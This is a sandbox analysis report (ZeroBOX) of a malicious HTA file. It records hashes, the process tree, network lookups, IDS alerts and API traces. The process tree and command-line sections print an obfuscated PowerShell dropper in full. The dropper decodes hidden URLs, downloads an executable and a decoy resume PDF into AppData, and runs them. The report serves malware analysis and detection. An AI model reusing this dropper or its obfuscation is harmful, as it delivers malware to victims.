popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

1.hta

Generic Malware Antivirus AntiVM AntiDebug PowerShell
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 Sept. 9, 2023, 9:38 p.m. Sept. 9, 2023, 9:40 p.m.
Size 116.2KB
Type HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5 ff3ba7711a230e6c17ac77a271ec3622
SHA256 f68000c54926a068647a10aacdba25153f8845a7f671ca43468ccabc8d758789
CRC32 95F4C7C8
ssdeep 1536:WYRX/65uRJemGN5+OQlWRl1Mk350P96ABNQsoNFc1Uoi2lOo5tSiYZLAlH6dk6UN:v/l0kQHSeM
Yara None matched

  • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\1.hta.html

    2620

    • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2620 CREDAT:145409

      2708

      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LiGvHIOT($txOWRyeIebeb, $oLpNFYWdIfVI){[IO.File]::WriteAllBytes($txOWRyeIebeb, $oLpNFYWdIfVI)};function FwSFiiFSYVTVTHXIL($txOWRyeIebeb){if($txOWRyeIebeb.EndsWith((uOOYYDAttqilkKNbGR @(57978,58032,58040,58040))) -eq $True){Start-Process (uOOYYDAttqilkKNbGR @(58046,58049,58042,58032,58040,58040,57983,57982,57978,58033,58052,58033)) $txOWRyeIebeb}else{Start-Process $txOWRyeIebeb}};function VfYawVMDSrUtxA($OSNQHjhsSMprXg){$oLFtNqCcnUSsMU = New-Object (uOOYYDAttqilkKNbGR @(58010,58033,58048,57978,58019,58033,58030,57999,58040,58037,58033,58042,58048));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$oLpNFYWdIfVI = $oLFtNqCcnUSsMU.DownloadData($OSNQHjhsSMprXg);return $oLpNFYWdIfVI};function uOOYYDAttqilkKNbGR($lIYzshXR){$wxUWk=57932;$cNLkEyfPHma=$Null;foreach($gHylftyO in $lIYzshXR){$cNLkEyfPHma+=[char]($gHylftyO-$wxUWk)};return $cNLkEyfPHma};function XMHJopzpJ(){$WOIZqGZPbjNthFdWxT = $env:AppData + '\';$xOAHReFL = $WOIZqGZPbjNthFdWxT + 'putty.exe'; if (Test-Path -Path $xOAHReFL){FwSFiiFSYVTVTHXIL $xOAHReFL;}Else{ $BUorXeLMEEUr = VfYawVMDSrUtxA (uOOYYDAttqilkKNbGR @(58036,58048,58048,58044,58047,57990,57979,57979,58048,58036,58033,57978,58033,58029,58046,58048,58036,57978,58040,58037,57979,58058,58047,58035,58048,58029,58048,58036,58029,58041,57979,58044,58049,58048,58048,58053,57979,58040,58029,58048,58033,58047,58048,57979,58051,57986,57984,57979,58044,58049,58048,58048,58053,57978,58033,58052,58033));LiGvHIOT $xOAHReFL $BUorXeLMEEUr;FwSFiiFSYVTVTHXIL $xOAHReFL;};$CzIiUhxSTLAUdkft = $WOIZqGZPbjNthFdWxT + 'resume.pdf';If(Test-Path -Path $CzIiUhxSTLAUdkft){Invoke-Item $CzIiUhxSTLAUdkft;}Else{ $KNkswdkLPiuMkJRrQhZq = VfYawVMDSrUtxA (uOOYYDAttqilkKNbGR @(58036,58048,58048,58044,58047,57990,57979,57979,58048,58046,58029,58042,58047,58034,58033,58046,57978,58047,58036,57979,58035,58033,58048,57979,57999,58037,58033,57989,58052,57988,57979,58046,58033,58047,58049,58041,58033,57978,58044,58032,58034));LiGvHIOT $CzIiUhxSTLAUdkft $KNkswdkLPiuMkJRrQhZq;Invoke-Item $CzIiUhxSTLAUdkft;};;;;}XMHJopzpJ;

        2932

Name Response Post-Analysis Lookup
apps.identrust.com
CNAME identrust.edgesuite.net
CNAME a1952.dscq.akamai.net
A 23.67.53.17
A 23.67.53.27
23.67.53.17
the.earth.li
A 93.93.131.124
93.93.131.124
transfer.sh
A 144.76.136.153
144.76.136.153
IP Address Status Action
144.76.136.153 Active Moloch
164.124.101.2 Active Moloch
23.67.53.17 Active Moloch
93.93.131.124 Active Moloch

Suricata Alerts

Flow SID Signature Category
UDP 192.168.56.101:54148 -> 164.124.101.2:53 2034316 ET POLICY Observed DNS Query to File Transfer Service Domain (transfer .sh) Potentially Bad Traffic
UDP 192.168.56.101:54148 -> 164.124.101.2:53 2035139 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in DNS Lookup) Misc activity
TCP 192.168.56.101:49169 -> 93.93.131.124:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49170 -> 93.93.131.124:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
UDP 192.168.56.101:54148 -> 8.8.8.8:53 2034316 ET POLICY Observed DNS Query to File Transfer Service Domain (transfer .sh) Potentially Bad Traffic
UDP 192.168.56.101:54148 -> 8.8.8.8:53 2035139 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in DNS Lookup) Misc activity
TCP 192.168.56.101:49171 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.101:49171 -> 144.76.136.153:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 144.76.136.153:443 -> 192.168.56.101:49171 2033076 ET POLICY Observed File Transfer Service SSL/TLS Certificate (transfer .sh) Potential Corporate Privacy Violation

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49171
144.76.136.153:443 		C=US, O=Let's Encrypt, CN=R3 CN=transfer.sh 4b:77:1f:b2:fe:8e:4f:93:e4:34:20:28:f2:b6:7a:3a:ff:0f:d1:f6

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003d2480
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32e340
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32e340
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32e340
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32e2d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32e2d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32e340
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32e340
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32e340
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32e340
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32e570
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32e570
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32e570
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32e030
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32e030
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32e030
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32eb20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32eb20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32eb20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32eb20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32eb20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32eb20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32eb20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b32eb20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000004507d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000004507d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000004507d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003b7c30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003b7c30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003b7bc0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003b7bc0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003b7ae0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003b7ae0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003b7ae0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b366bd0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b366bd0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b366c40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b366c40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3676c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3676c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003d2330
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003d2330
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003d23a0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003d23a0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003d23a0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003d23a0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003b7c30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003b7c30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3b3ba0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3b3ba0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2620
region_size: 13570048
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002c10000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2620
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000003900000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769cd000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769d4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefbca5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefbca5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefefc4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdcd1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769ba000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2620
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000030e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007304c000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000003900000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769cd000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769d4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefbca5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefefc4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdcd1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769ba000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2708
region_size: 8851456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002600000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2708
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002e70000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2708
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2708
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2708
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2708
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2708
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2708
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2708
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769cd000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2708
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0
file C:\Users\test22\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LiGvHIOT($txOWRyeIebeb, $oLpNFYWdIfVI){[IO.File]::WriteAllBytes($txOWRyeIebeb, $oLpNFYWdIfVI)};function FwSFiiFSYVTVTHXIL($txOWRyeIebeb){if($txOWRyeIebeb.EndsWith((uOOYYDAttqilkKNbGR @(57978,58032,58040,58040))) -eq $True){Start-Process (uOOYYDAttqilkKNbGR @(58046,58049,58042,58032,58040,58040,57983,57982,57978,58033,58052,58033)) $txOWRyeIebeb}else{Start-Process $txOWRyeIebeb}};function VfYawVMDSrUtxA($OSNQHjhsSMprXg){$oLFtNqCcnUSsMU = New-Object (uOOYYDAttqilkKNbGR @(58010,58033,58048,57978,58019,58033,58030,57999,58040,58037,58033,58042,58048));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$oLpNFYWdIfVI = $oLFtNqCcnUSsMU.DownloadData($OSNQHjhsSMprXg);return $oLpNFYWdIfVI};function uOOYYDAttqilkKNbGR($lIYzshXR){$wxUWk=57932;$cNLkEyfPHma=$Null;foreach($gHylftyO in $lIYzshXR){$cNLkEyfPHma+=[char]($gHylftyO-$wxUWk)};return $cNLkEyfPHma};function XMHJopzpJ(){$WOIZqGZPbjNthFdWxT = $env:AppData + '\';$xOAHReFL = $WOIZqGZPbjNthFdWxT + 'putty.exe'; if (Test-Path -Path $xOAHReFL){FwSFiiFSYVTVTHXIL $xOAHReFL;}Else{ $BUorXeLMEEUr = VfYawVMDSrUtxA (uOOYYDAttqilkKNbGR 